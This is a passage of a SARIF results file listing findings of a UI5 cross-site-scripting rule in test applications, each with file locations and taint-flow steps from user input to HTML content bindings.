value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":475},"region":{"startLine":9,"startColumn":5,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"9caa0f252fbe2993:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":475},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":31,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":9,"startColumn":25,"endColumn":53}},"message":{"text":"oModel. ... input')"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":9,"startColumn":17,"endColumn":22}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":10,"startColumn":44,"endColumn":49}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":32,"startColumn":17,"endColumn":30}},"message":{"text":"output1: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":475},"region":{"startLine":9,"startColumn":5,"endColumn":40}},"message":{"text":"content={/output1}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":475},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":475},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":475},"region":{"startLine":17,"startColumn":5,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"2963bbd458e69924:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":18,"startColumn":31,"endColumn":60}},"message":{"text":"oEvent. ... Value()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":18,"startColumn":17,"endColumn":28}},"message":{"text":"sInputValue"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":19,"startColumn":44,"endColumn":55}},"message":{"text":"sInputValue"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":34,"startColumn":17,"endColumn":30}},"message":{"text":"output3: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":475},"region":{"startLine":17,"startColumn":5,"endColumn":40}},"message":{"text":"content={/output3}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":18,"startColumn":31,"endColumn":60}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":18,"startColumn":31,"endColumn":60}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":30,"startColumn":5,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"711f70e4b3e36d36:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":27,"startColumn":5,"endLine":29,"endColumn":30}},"message":{"text":"value={/input0}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503},"region":{"startLine":9,"startColumn":17,"endColumn":29}},"message":{"text":"input0: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":30,"startColumn":5,"endColumn":38}},"message":{"text":"content={/input0}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":27,"startColumn":5,"endLine":29,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":27,"startColumn":5,"endLine":29,"endColumn":30}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":45,"startColumn":5,"endColumn":60}}}],"partialFingerprints":{"primaryLocationLineHash":"8d13cc83b72acee:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":42,"startColumn":5,"endLine":44,"endColumn":30}},"message":{"text":"value={/input3}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503},"region":{"startLine":12,"startColumn":17,"endColumn":29}},"message":{"text":"input3: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":45,"startColumn":5,"endColumn":60}},"message":{"text":"content={/input3}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":42,"startColumn":5,"endLine":44,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":42,"startColumn":5,"endLine":44,"endColumn":30}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":50,"startColumn":5,"endColumn":82}}}],"partialFingerprints":{"primaryLocationLineHash":"4698f735d8a1f320:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":47,"startColumn":5,"endLine":49,"endColumn":30}},"message":{"text":"value={/input4}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503},"region":{"startLine":13,"startColumn":17,"endColumn":29}},"message":{"text":"input4: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":50,"startColumn":5,"endColumn":82}},"message":{"text":"content={/input4}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":47,"startColumn":5,"endLine":49,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":47,"startColumn":5,"endLine":49,"endColumn":30}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":58,"startColumn":5,"endColumn":66}}}],"partialFingerprints":{"primaryLocationLineHash":"bb503c8d5e14583a:1","primaryLocationStartColumnFingerprint":"0"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":58,"startColumn":5,"endColumn":66}},"message":{"text":"user-provided value"}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":515},"region":{"startLine":8,"startColumn":5,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"1406455ac263a2d9:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":515},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":511},"region":{"startLine":12,"startColumn":26,"endColumn":46}},"message":{"text":"new JSONModel(oData)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":515},"region":{"startLine":8,"startColumn":5,"endColumn":38}},"message":{"text":"content={/output}"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":515},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":511},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":511},"region":{"startLine":15,"startColumn":25,"endColumn":53}},"message":{"text":"oModel. ... input')"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":511},"region":{"startLine":15,"startColumn":17,"endColumn":22}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":511},"region":{"startLine":16,"startColumn":43,"endColumn":48}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":511},"region":{"startLine":10,"startColumn":17,"endColumn":29}},"message":{"text":"output: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":515},"region":{"startLine":8,"startColumn":5,"endColumn":38}},"message":{"text":"content={/output}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":515},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":515},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":532},"region":{"startLine":8,"startColumn":5,"endColumn":37}}}],"partialFingerprints":{"primaryLocationLineHash":"97b29ed20ac04ff0:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":532},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":527},"region":{"startLine":8,"startColumn":40,"endColumn":63}},"message":{"text":"\"contro ... l.json\""}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":532},"region":{"startLine":8,"startColumn":5,"endColumn":37}},"message":{"text":"content={/input}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":532},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":532},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":539},"region":{"startLine":8,"startColumn":11,"endColumn":34}}}],"partialFingerprints":{"primaryLocationLineHash":"5edd24be658b61a4:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":539},"region":{"startLine":5,"startColumn":11,"endColumn":32}},"message":{"text":"data-value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":536},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":539},"region":{"startLine":8,"startColumn":11,"endColumn":34}},"message":{"text":"data-content={/input}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":539},"region":{"startLine":5,"startColumn":11,"endColumn":32}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":539},"region":{"startLine":5,"startColumn":11,"endColumn":32}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/fragments/Content.fragment.xml","uriBaseId":"%SRCROOT%","index":591},"region":{"startLine":7,"startColumn":9,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"c309f19ffc23c12c:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":49,"endColumn":71}},"message":{"text":"window. ... .search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":29,"endColumn":72}},"message":{"text":"new URL ... search)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":17,"endColumn":26}},"message":{"text":"oUrlQuery"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":11,"startColumn":34,"endColumn":43}},"message":{"text":"oUrlQuery"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":11,"startColumn":34,"endColumn":58}},"message":{"text":"oUrlQue ... yload\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":11,"startColumn":17,"endColumn":31}},"message":{"text":"sRemotePayload"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":19,"startColumn":32,"endColumn":46}},"message":{"text":"sRemotePayload"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":19,"startColumn":17,"endColumn":46}},"message":{"text":"remoteP ... Payload"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/fragments/Content.fragment.xml","uriBaseId":"%SRCROOT%","index":591},"region":{"startLine":7,"startColumn":9,"endColumn":50}},"message":{"text":"content={/remotePayload}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":49,"endColumn":71}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":49,"endColumn":71}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/view/Display.view.xml","uriBaseId":"%SRCROOT%","index":595},"region":{"startLine":6,"startColumn":13,"endColumn":54}}}],"partialFingerprints":{"primaryLocationLineHash":"73d863641b350f79:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":49,"endColumn":71}},"message":{"text":"window. ... .search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":29,"endColumn":72}},"message":{"text":"new URL ... search)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":17,"endColumn":26}},"message":{"text":"oUrlQuery"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":11,"startColumn":34,"endColumn":43}},"message":{"text":"oUrlQuery"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":11,"startColumn":34,"endColumn":58}},"message":{"text":"oUrlQue ... yload\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":11,"startColumn":17,"endColumn":31}},"message":{"text":"sRemotePayload"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":19,"startColumn":32,"endColumn":46}},"message":{"text":"sRemotePayload"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":19,"startColumn":17,"endColumn":46}},"message":{"text":"remoteP ... Payload"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/view/Display.view.xml","uriBaseId":"%SRCROOT%","index":595},"region":{"startLine":6,"startColumn":13,"endColumn":54}},"message":{"text":"content={/remotePayload}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":49,"endColumn":71}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":49,"endColumn":71}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1).\nXSS vulnerability due to [user-provided value](2)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":602},"region":{"startLine":22,"startColumn":5,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"6e0d8f690e30e24a:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":602},"region":{"startLine":8,"startColumn":5,"endLine":10,"endColumn":27}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":599},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: 